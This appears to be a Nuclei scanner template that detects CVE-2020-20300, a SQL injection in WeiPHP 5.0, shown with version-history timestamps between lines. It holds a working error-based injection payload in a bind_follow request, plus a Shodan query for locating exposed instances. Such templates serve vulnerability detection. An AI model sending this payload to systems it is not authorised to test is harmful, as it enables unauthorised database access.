2022-09-29 13:38:41 +00:00
id : CVE-2020-20300
2022-07-26 11:58:08 +00:00
info :
2022-09-29 13:38:41 +00:00
name : WeiPHP 5.0 - SQL Injection
2022-07-26 11:58:08 +00:00
author : pikpikcu
2022-09-29 13:38:41 +00:00
severity : critical
description : WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-26 11:58:08 +00:00
reference :
- https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md
2022-09-29 13:38:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-20300
2022-09-29 13:52:24 +00:00
- https://github.com/Y4er/Y4er.com/blob/master/content/post/weiphp-exp-sql.md
2022-09-29 13:38:41 +00:00
classification :
2022-09-29 13:52:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-09-29 13:38:41 +00:00
cwe-id : CWE-89
2022-10-10 19:22:59 +00:00
cve-id : CVE-2020-20300
2022-07-26 11:58:08 +00:00
metadata :
shodan-query : http.html:"WeiPHP5.0"
2022-09-29 13:52:24 +00:00
verified : "true"
2022-07-26 11:58:08 +00:00
tags : weiphp,sql
requests :
- method : POST
path :
- "{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "
matchers-condition : and
matchers :
- type : word
part : body
words :
- "52c69e3a57331081823331c4e69d3f2"
- type : status
status :
- 500
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28